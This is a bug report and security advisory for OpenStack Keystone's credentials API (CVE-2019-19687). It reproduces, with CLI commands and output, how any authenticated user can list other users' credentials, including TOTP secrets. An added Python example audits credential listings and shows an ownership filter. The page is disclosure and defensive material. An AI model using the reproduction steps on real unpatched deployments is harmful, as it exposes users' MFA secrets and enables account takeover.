[OSSA-2019-006] Credentials API allows listing and retrieving of all users credentials (CVE-2019-19687)
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Identity (keystone) | Fix Released | Critical | Colleen Murphy | |
| OpenStack Security Advisory | Fix Released | High | Gage Hugo | |
| keystone (Ubuntu) | Fix Released | Undecided | Unassigned | |
Bug Description
Tested against Stein and Train.
# User creating a credential, i.e totp or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 6b28a0b073fc4ac
$ OS_CLOUD=2 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f3
| user_id | 2e48f1a7d147439
$ OS_CLOUD=3 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
As shown, anyone who's authenticated can retrieve any credentials, including their 'secret'.
This is a rather severe information disclosure vulnerability and completely defies the purpose of TOTP or MFA, as these credentials are not kept secure or private whatsoever.
If auth rules are configured to allow login with only 'totp', it would be extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.
ii keystone-common 2:16.0.
ii python-
ii python-
ii python-
ii python3-keystone 2:16.0.
ii python3-
ii python3-
ii python3-
Stein/RHEL:
$ rpm -qa | grep keystone
python3-
openstack-
python3-
python3-
python3-
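The following is an added example, not code from the bug reporter or from the keystone project. It shows the two checks a defender wants around this report: an audit that parses the output of `openstack credential list -f json` (key names assumed to match the column headers shown above; the listing itself is constructed here, with one credential ID taken from the report and the others made up) and flags every credential not owned by the calling user, and the server-side ownership filter that a patched API is expected to apply, so that a non-admin caller only ever sees their own credentials.

```python
import json
from dataclasses import dataclass

# Constructed sample of `openstack credential list -f json` output as an
# UNPATCHED deployment might return it to the user 9971b0f13d2d4a5.
# Key names are assumed to equal the column headers; secrets are placeholders.
UNPATCHED_LISTING = json.dumps([
    {"ID": "0a3a2d3b7dad488", "Type": "totp", "User ID": "9971b0f13d2d4a5",
     "Data": '{"secret": "EXAMPLE-SECRET-1"}', "Project ID": "c3caf1b55bb84b7"},
    {"ID": "cred-constructed-2", "Type": "totp", "User ID": "6b28a0b073fc4ac",
     "Data": '{"secret": "EXAMPLE-SECRET-2"}', "Project ID": "c3caf1b55bb84b7"},
    {"ID": "cred-constructed-3", "Type": "ec2", "User ID": "2e48f1a7d147439",
     "Data": '{"access": "x", "secret": "EXAMPLE-SECRET-3"}', "Project ID": "d43f20ae5a7e4f3"},
])

# Constructed sample of what the same call should return once the API filters
# by the caller's user ID: only the caller's own credential.
PATCHED_LISTING = json.dumps([
    {"ID": "0a3a2d3b7dad488", "Type": "totp", "User ID": "9971b0f13d2d4a5",
     "Data": '{"secret": "EXAMPLE-SECRET-1"}', "Project ID": "c3caf1b55bb84b7"},
])


def foreign_credentials(listing_json: str, caller_user_id: str) -> list:
    """Return the credential IDs in a listing that belong to a user other than
    the caller. On a correctly authorized API this list is empty for any
    non-admin caller."""
    rows = json.loads(listing_json)
    return [row["ID"] for row in rows if row.get("User ID") != caller_user_id]


def listing_exposes_other_users(listing_json: str, caller_user_id: str) -> bool:
    """True when a non-admin caller's listing contains anyone else's credentials,
    i.e. the deployment still shows the behaviour described in this report."""
    return bool(foreign_credentials(listing_json, caller_user_id))


@dataclass(frozen=True)
class Credential:
    """Minimal stand-in for a stored credential record (hypothetical type)."""
    id: str
    user_id: str
    type: str
    project_id: str


def visible_credentials(stored, caller_user_id: str, caller_is_admin: bool) -> list:
    """Ownership filter a credential listing endpoint should apply before
    returning records: administrators may list everything, everyone else is
    restricted to credentials whose user_id matches the token's user_id."""
    if caller_is_admin:
        return list(stored)
    return [c for c in stored if c.user_id == caller_user_id]


if __name__ == "__main__":
    me = "9971b0f13d2d4a5"
    print("unpatched listing leaks:", foreign_credentials(UNPATCHED_LISTING, me))
    print("patched listing leaks:", foreign_credentials(PATCHED_LISTING, me))
```

The audit functions are meant to be run after the fix is deployed, with the JSON captured from a deliberately unprivileged account in a project that also contains other users' credentials; any non-empty result from `foreign_credentials` means the ownership check is still missing.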
CVE References
Changed in keystone:
status: New → Confirmed
importance: Undecided → Critical
information type: Private Security → Public Security
summary: "Credentials API allows listing and retrieving of all user's credentials" → "Credentials API allows listing and retrieving of all users' credentials"
summary: "Credentials API allows listing and retrieving of all users credentials" → "[OSSA-2019-006] Credentials API allows listing and retrieving of all users credentials (CVE-2019-19687)"
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.